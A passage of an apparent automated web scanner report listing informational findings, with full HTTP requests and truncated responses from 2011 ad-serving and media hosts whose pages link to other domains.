UE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%3Dhttp://clk.atdmt.com/COM/go/335787632/direct;wi.728;hi.90/01/" target="_blank"><img border="0" src="http://view.atdmt.com/COM/view/335787632/direct;wi.728;hi.90/01/" /></a>
...[SNIP]...

17.52. http://ca.rtb.prod2.invitemedia.com/build_creative  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ca.rtb.prod2.invitemedia.com
Path:   /build_creative

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url=&cost=0.7415&mapped_uid=7-55785307-A5DC-4E3A-B452-DDBD426D3A1D&us_id=6538&creative_id=130642&campaign_id=66395&source_url=http%3A%2F%2Fwww.bostonherald.com&exch_id=7&auction_id=DF6F1023-DF46-4B55-9BE1-743D9864BCA3&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D60719089%26rk1%3D94605455%26rk2%3D1316239725.491%26pt%3D0&line_item_id=725814&invite_uid=d454714d-69b5-4195-969b-ba426f1012c3&zip_code=75207 HTTP/1.1
Host: ca.rtb.prod2.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=60719089&rk1=94605455&rk2=1316239725.491&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=*

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 01:07:20 GMT
Content-Type: text/html
Content-Length: 2949
Connection: keep-alive

<html>
<style>
body { margin:0px; padding:0px; }
</style>
<body>
<iframe src="http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTsOxCAMRdGtRK6DhL9AujAMq0HTTRVl77HT3SP5yRcww7FRq2z7BkyOQlpRXOiAMW1iJk5jiiXpqqn1L6YiPFo16Z.TIaZxXJRyCdGrKPUy5eopnr__Wp4WfzIp3g.I6RnX%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90"><script language="JavaScript" type="text/javascript">
...[SNIP]...
UE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%3Dhttp://clk.atdmt.com/COM/go/335787632/direct;wi.728;hi.90/01/" target="_blank"><img border="0" src="http://view.atdmt.com/COM/view/335787632/direct;wi.728;hi.90/01/" /></a>
...[SNIP]...

17.53. http://ca.rtb.prod2.invitemedia.com/build_creative  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ca.rtb.prod2.invitemedia.com
Path:   /build_creative

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAACAAAANTU3ODUzMDctQTVEQy00RTNBLUI0NTItRERCRDQyNkQzQTFEAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAA=_url=&cost=0.7415&mapped_uid=7-55785307-A5DC-4E3A-B452-DDBD426D3A1D&us_id=6538&creative_id=130642&campaign_id=66395&source_url=http%3A%2F%2Fwww.bostonherald.com&exch_id=7&auction_id=9EBAE5DB-3E65-4546-8052-5CBEB0DC6923&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D30568955%26rk1%3D84725501%26rk2%3D1316239623.514%26pt%3D0&line_item_id=725814&invite_uid=d454714d-69b5-4195-969b-ba426f1012c3&zip_code=75207 HTTP/1.1
Host: ca.rtb.prod2.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=30568955&rk1=84725501&rk2=1316239623.514&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=*

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 01:05:37 GMT
Content-Type: text/html
Content-Length: 2945
Connection: keep-alive

<html>
<style>
body { margin:0px; padding:0px; }
</style>
<body>
<iframe src="http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOgCAMheGrmM6SQMsr4CbIbYybk_Hutm7_l_SlD4nQtnCroutCwobCqCmbkoHa7PvE0YNMRcjIGmoEB4w.ezyGNhbyqR8XcCwu_uUFK4VUy2x53edpqf4nMtL7AY4qGeI-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAACAAAANTU3ODUzMDctQTVEQy00RTNBLUI0NTItRERCRDQyNkQzQTFEAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAA%253D_url%253D" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90"><script language="JavaScript" type="text/javascript">
...[SNIP]...
EQy00RTNBLUI0NTItRERCRDQyNkQzQTFEAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAA%3D_url%3Dhttp://clk.atdmt.com/COM/go/335787632/direct;wi.728;hi.90/01/" target="_blank"><img border="0" src="http://view.atdmt.com/COM/view/335787632/direct;wi.728;hi.90/01/" /></a>
...[SNIP]...

17.54. http://ca.rtb.prod2.invitemedia.com/build_creative  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ca.rtb.prod2.invitemedia.com
Path:   /build_creative

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url=&cost=0.7415&mapped_uid=7-55785307-A5DC-4E3A-B452-DDBD426D3A1D&us_id=6538&creative_id=130642&campaign_id=66395&source_url=http%3A%2F%2Fwww.bostonherald.com&exch_id=7&auction_id=16233E2D-E708-4A27-9A6C-AFFA9B0751F6&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38484872%26rk1%3D72091245%26rk2%3D1316239534.984%26pt%3D0&line_item_id=725814&invite_uid=d454714d-69b5-4195-969b-ba426f1012c3&zip_code=75207 HTTP/1.1
Host: ca.rtb.prod2.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=38484872&rk1=72091245&rk2=1316239534.984&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=*

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 01:04:09 GMT
Content-Type: text/html
Content-Length: 2965
Connection: keep-alive

<html>
<style>
body { margin:0px; padding:0px; }
</style>
<body>
<iframe src="http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOwzAIheGrRMy1ZB4G7G5OG58mypap6t0L3f5P4okPidBzw.hij40EAYd2biEOEBtEDrzL4bWXNuFlTHuVudYce3XlZZTTPHZF9RT.ytIoU.mRLfK6zzPS8k.F8vcHhFgZ0Q--%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90"><script language="JavaScript" type="text/javascript">
...[SNIP]...
UE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%3Dhttp://clk.atdmt.com/COM/go/335787632/direct;wi.728;hi.90/01/" target="_blank"><img border="0" src="http://view.atdmt.com/COM/view/335787632/direct;wi.728;hi.90/01/" /></a>
...[SNIP]...

17.55. http://ca.rtb.prod2.invitemedia.com/build_creative  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ca.rtb.prod2.invitemedia.com
Path:   /build_creative

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url=&cost=0.7415&mapped_uid=7-55785307-A5DC-4E3A-B452-DDBD426D3A1D&us_id=6538&creative_id=130642&campaign_id=66395&source_url=http%3A%2F%2Fwww.bostonherald.com&exch_id=7&auction_id=AC773BCE-3537-498F-A0DE-08F1E93A0DFA&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D76636540%26rk1%3D31623743%26rk2%3D1316239581.994%26pt%3D0&line_item_id=725814&invite_uid=d454714d-69b5-4195-969b-ba426f1012c3&zip_code=75207 HTTP/1.1
Host: ca.rtb.prod2.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=76636540&rk1=31623743&rk2=1316239581.994&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=*

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 01:04:58 GMT
Content-Type: text/html
Content-Length: 2949
Connection: keep-alive

<html>
<style>
body { margin:0px; padding:0px; }
</style>
<body>
<iframe src="http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOAyEMRNGrrFwHCTwYm3QsC6dZpUsV5e6x070veeQPAfQ8uBva4yCwh7JYqV7Fg8ZUxTlXgkBT7bbTyNdK2XZZHe49KKZxrMJZo_hfIXE1gTmr8_W.b2eLP5mlfH.U0hoC%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90"><script language="JavaScript" type="text/javascript">
...[SNIP]...
UE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%3Dhttp://clk.atdmt.com/COM/go/335787632/direct;wi.728;hi.90/01/" target="_blank"><img border="0" src="http://view.atdmt.com/COM/view/335787632/direct;wi.728;hi.90/01/" /></a>
...[SNIP]...

17.56. http://cache2-scripts.pressdisplay.com/res/WebResource.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache2-scripts.pressdisplay.com
Path:   /res/WebResource.ashx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /res/WebResource.ashx?script=home3&v=1403&caching=1 HTTP/1.1
Host: cache2-scripts.pressdisplay.com
Proxy-Connection: keep-alive
Referer: http://bostonheraldnie.newspaperdirect.com/epaper/homepage_v2.aspx?date=17.9.2011&width=1087
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: public
Content-Type: text/javascript; charset=utf-8
Date: Sat, 17 Sep 2011 01:04:37 GMT
Expires: Sat, 17 Dec 2011 02:04:37 GMT
Last-Modified: Thu, 15 Sep 2011 00:50:01 GMT
Server: ECS (sjo/523D)
Vary: Accept-Encoding
wc: 2
wc: 2
X-Cache: HIT
X-Powered-By: ASP.NET
Content-Length: 206211

// www.PressDisplay.com
// .. 2003-2007 NewspaperDirect, Inc. All rights reserved.
// HomePageManager

HomePageManager={};HomePageManager.version=3;HomePageManager.zoneoffset=new Date().getTimezon
...[SNIP]...
("autostart_newspapersflash")=="false"?"false":"true")+'&v='+t.version+'&n='+encodeURIComponent(t.counters.n)+'&c='+encodeURIComponent(t.counters.c)+'&l='+encodeURIComponent(t.counters.l);var content='<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="100%" height="64" id="img_newspapers" align="middle">'+'<param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...

17.57. http://cdn.polls.tmz.com/polls/34613/iframe  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.polls.tmz.com
Path:   /polls/34613/iframe

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /polls/34613/iframe?stencil_id=394 HTTP/1.1
Host: cdn.polls.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:50:37 GMT
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Runtime: 0.00165
ETag: "113b4fead1c04532755f9922eb6f7ffc"
Cache-Control: private, max-age=0, must-revalidate, s-maxage=5
Status: 200 OK
Cache-Control: max-age=120
Expires: Sat, 17 Sep 2011 00:52:37 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4698
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<link href="http://cdn.polls.tmz.com/stencils/394.css" media="screen" rel="stylesheet" type="text/css" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://tmz.vo.llnwd.net/o28/assets/js/jquery.screwdefaultbuttons.js"></script>
...[SNIP]...
<button type="submit">
<img src="http://tmz.vo.llnwd.net/o28/assets/polls/images/tf-vote-btn.png">
</button>
...[SNIP]...

17.58. http://cdn.polls.tmz.com/polls/34614/iframe  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.polls.tmz.com
Path:   /polls/34614/iframe

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /polls/34614/iframe?stencil_id=373 HTTP/1.1
Host: cdn.polls.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:51:59 GMT
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Runtime: 0.00174
ETag: "df15fee33fbc869c5744335d4cae8dee"
Cache-Control: private, max-age=0, must-revalidate, s-maxage=5
Status: 200 OK
Cache-Control: max-age=120
Expires: Sat, 17 Sep 2011 00:53:59 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4441
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<link href="http://cdn.polls.tmz.com/stencils/373.css" media="screen" rel="stylesheet" type="text/css" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<form action='http://polls.tmz.com/polls/34614/vote?stencil_id=373' method='post'>
       
<script type="text/javascript" src="http://tmz.vo.llnwd.net/o28/assets/js/jquery.screwdefaultbuttons.js"></script>
...[SNIP]...
<button type="submit" value="VOTE!"><img src="http://tmz.vo.llnwd.net/o28/assets/images/vote_btnv2.jpg" />
</button>
...[SNIP]...

17.59. http://choices.truste.com/ca  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ca?aid=att02&pid=mec01&cid=0511wl728x90&w=728&h=90&plc=tr&iplc=ctr&zi=10002&c=att02cont12&js=2 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOwzAIheGrRMy1ZB4G7G5OG58mypap6t0L3f5P4okPidBzw.hij40EAYd2biEOEBtEDrzL4bWXNuFlTHuVudYce3XlZZTTPHZF9RT.ytIoU.mRLfK6zzPS8k.F8vcHhFgZ0Q--%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:04:12 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 23519
Connection: keep-alive

truste.ca.addClearAdIcon=function(C){if(!truste.ca[C.baseName+"_bi"]){truste.ca[C.baseName+"_bi"]=C}truste.ca.adTypeMap[C.baseName]=1;
var c=truste.ca.findCreative(C);if(!c){var p=null;if(truste.ca.IE
...[SNIP]...
</span>';
var a="http://choices.truste.com/assets/admarker.swf";var g="77";if(h.cam=="3"||h.cam=="4"){a="http://choices.truste.com/get?name=ad_icon.swf";
g="19"}var e='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash4/cabs/swflash.cab#version=4,0,0,0" id="tecafi" width="'+g+'" height="16" style="position: relative"><param name="flashVars" value="bindingId='+h.baseName+'"/>
...[SNIP]...
<img width="77px" height="15px" src="'+k.icon_cam_mo+'" style="border:none;position:absolute;right:0px;top:0;">';
if(f){i='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash4/cabs/swflash.cab#version=4,0,0,0" id="tecafi" width="58" height="16" style="position: relative"><param name="flashVars" value="bindingId='+k.baseName+'"/>
...[SNIP]...

17.60. http://choices.truste.com/ca  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ca?pid=mec01&aid=att02&cid=0511wl728x90&c=att02cont12&w=728&h=90&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOwzAIheGrRMy1ZB4G7G5OG58mypap6t0L3f5P4okPidBzw.hij40EAYd2biEOEBtEDrzL4bWXNuFlTHuVudYce3XlZZTTPHZF9RT.ytIoU.mRLfK6zzPS8k.F8vcHhFgZ0Q--%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:04:10 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5657
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
<hr>\n <a href="http://bit.ly/atttrustewired" target="_blank">Online Privacy Library &raquo;</a>
...[SNIP]...
<hr>\n <a href="http://bit.ly/ffdQkR" target="_blank">AT&amp;T Privacy FAQ &raquo;</a></b><a href="http://bit.ly/ffdQkR" target="_blank"></a>
...[SNIP]...

17.61. http://cim.meebo.com/cim  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cim.meebo.com
Path:   /cim

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cim?iv=4&network=tmz HTTP/1.1
Host: cim.meebo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
